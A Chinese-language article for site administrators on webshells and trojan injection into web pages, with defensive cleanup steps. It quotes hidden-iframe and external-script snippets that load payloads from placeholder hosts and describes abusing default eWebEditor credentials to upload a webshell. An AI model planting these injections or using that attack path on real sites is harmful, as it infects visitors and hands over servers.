網頁後門和網頁掛馬
網頁後門網頁後門其實就是一段網頁代碼,主要以ASP和PHP代碼為主。由於這些代碼都運行在伺服器端,攻擊者通過這段精心設計的代碼,在伺服器端進行某些危險的操作,獲得某些敏感的技術信息或者通過滲透,提權獲得伺服器的控制權。並且這也是攻擊者控制伺服器的一條通道,比一般的入侵更具有隱蔽性。
網頁掛馬網頁掛馬就是攻擊者通過在正常的頁面中(通常是網站的主頁)插入一段代碼。瀏覽者在打開該頁面的時候,這段代碼被執行,然後下載並運行某木馬的伺服器端程式,進而控制瀏覽者的主機。
網頁掛馬的類型
1、框架嵌入式網路掛馬網頁木馬被攻擊者利用iframe語句,載入到任意網頁中都可執行的掛馬形式,是最早也是最有效的的一種網路掛馬技術。通常的掛馬代碼如下:
以下是引用片段: <iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe> |
解釋:在打開插入該句代碼的網頁後,就也就打開了http://www.xxx.com/muma.html頁面,但是由於它的長和寬都為“0”,所以很難察覺,非常具有隱蔽性。下面我們做過做個演示,比如在某網頁中插入如下代碼:
以下是引用片段: <iframe src=http://safe.it168.com width=200 height=200></iframe> |
js掛馬是一種利用js腳本檔案調用的原理進行的網頁木馬隱蔽掛馬技術,如:黑客先製作一個.js檔案,然後利用js代碼調用到掛馬的網頁。通常代碼如下:
以下是引用片段: <script language=javascript src=http://www.xxx.com/gm.js></script> |
隨著防毒技術的發展,黑手段也不停地更新,圖片木馬技術逃避防毒監視的新技術,攻擊者將類似: /Article/UploadFiles/200804/20080402113208921.gif圖片檔案中,這些嵌入代碼的圖片都可以用工具生成,攻擊者只需輸入相關的選項就可以了,如圖3。圖片木馬生成後,再利用代碼調用執行,是比較新穎的一種掛馬隱蔽方法,實例代碼如:
以下是引用片段: <html> <iframe src="http://www.xxx.com/test.htm" height=0 width=0> </iframe> <img src="/Article/UploadFiles/200804/20080402113212263.jpg"></center> </html> |
網路中最常見的欺騙手段,黑客們利用人們的獵奇、貪心等心理偽裝構造一個連結或者一個網頁,利用社會工程學欺騙方法,引誘點擊,當用戶打開一個看似正常的頁面時,網頁代碼隨之運行,隱蔽性極高。這種方式往往和欺騙用戶輸入某些個人隱私信息,然後竊取個人隱私相關聯。比如攻擊者模仿騰訊公司設計了一個獲取QQ幣的頁面,引誘輸入QQ好和密碼
5、偽裝掛馬高級欺騙,黑客利用IE或者Fixfox瀏覽器的設計缺陷製造的一種高級欺騙技術,當用戶訪問木馬頁面時地址欄顯示www.sina.com或者security.ctocio.com.cn等用戶信任地址,其實卻打開了被掛馬的頁面,從而實現欺騙,示例代碼如:
以下是引用片段: <p><a id="qipian" href="http://www.hacker.com.cn"></a></p> <div> <a href="http://safe.it168.com" target="_blank"> <table> <caption> <label for="qipian"> <u style="cursor;pointer;color;blue"> </u> </label> </caption> </table> </a> </div> |
上述的掛馬方式都是利用了系統的漏洞,並且掛馬的代碼不用攻擊者編寫,都是實現了工具化、傻瓜化。技術門檻比較低,因此危害也特別大。
網頁漏洞的尋找方法
網頁的漏洞威脅網頁的漏洞主要有注入漏洞、跨站漏洞、旁註漏洞、上傳漏洞、暴庫漏洞和程式漏洞等等。針對這么多的漏洞威脅,網站管理員要對自己的網站進行安全檢測,然後進行安全設定或者代碼改寫。那如何來檢測網站存在的漏洞呢?其實,很多攻擊者都是通過一些黑客工具來檢測網站的漏洞然後實施攻擊的。那么網站的管理員就可以利用這些工具對網站進行安全檢測,看有沒有上述漏洞,筆者就不一一演示了。下面就列舉一個當前比較流行的eWebEditor線上HTML編輯器上傳漏洞做個演示和分析。
網站入侵分析eWEBEditor是一個線上的HTML編輯器,很多網站都集成這個編輯器,以方便發布信息。低版本的eWEBEditor線上HTML編輯器,存在者上傳漏洞,黑客利用這點得到WEBSHELL(網頁管理許可權)後,修改了網站,進行了掛馬操作。
其原理是:eWEBEditor的默認管理員登錄頁面沒有更改,而且默認的用戶名和密碼都沒有更改。攻擊者登入eWEBEditor後,添加一種新的樣式類型,然後設定上傳檔案的類型,比如加入asp檔案類型,就可以上傳一個網頁木馬了。
(1)攻擊者判斷網站是否採用了eWEBEditor的方法一般都是通過瀏覽網站查看相關的頁面或者通過搜尋引擎搜尋類似"ewebeditor.asp?id="語句,只要類似的語句存在,就能判斷網站確實使用了WEB編輯器。
(2)eWEBEditor編輯器可能被黑客利用的安全漏洞:
a.管理員未對資料庫的路徑和名稱進行修改,導致黑客可以利用編輯器默認路徑直接對網站資料庫進行下載。
b.管理員未對編輯器的後台管理路徑進行修改導致黑客可以通過資料庫獲得的用戶名和密碼進行登入或者直接輸入默認的用戶名和密碼,直接進入編輯器的後台。
c.該WEB編輯器上傳程式存在安全漏洞。
網頁木馬的防禦和清除
1、防禦網頁木馬1、防禦網頁木馬,伺服器設定非常重要,反註冊、卸載危險組件:(網頁後門木馬調用的組件)
(1)卸載wscript.shell對象,在cmd先或者直接運行:
regsvr32 /u %windir%\system32\wshom.ocx
(2)卸載FSO對象,在cmd下或者直接運行:
regsvr32.exe /u %windir%\system32\scrrun.dll
(3)卸載stream對象,在cmd下或者直接運行:
regsvr32.exe /u /s "C:\Program Files\Common Files\System\ado\msado15.dll"
註:如果想恢復的話只需重新註冊即可,例如:
regsvr32 %windir%\system32\WSHom.Ocx
(1)利用雷客圖ASP站長安全助手查找所有在2008-3.1日-2008.3.5日之間所有修改過的檔案里是否有iframe語句和http://www.xxx.com/a.htm關鍵字,進行手工清理。
(2)也可利用雷客圖ASP站長安全助手批量刪除網馬。
(3)檢測JS檔案,在2008-3.1日-2008.3.5日之間增加的JS檔案全部刪除
由於網站在開發時集成了eWEBEditor編輯器,刪除或者替換容易導致其他問題的出現,推薦按如下方案解決:
(1)修改該編輯器的默認資料庫路徑和資料庫名,防止被黑客非法下載。
默認登錄路徑admin_login.asp 默認資料庫db/ewebeditor.mdb
(2)修改編輯器後台登錄路徑和默認的登錄用戶名和密碼,防止黑客進入管理界面。
總結:網頁後門和網頁掛馬是網站最大的敵人,他們對網站的危害幾乎是毀滅性的。網站管理員們只有了解了其原理、掌握防治技術才能保護網站的安全。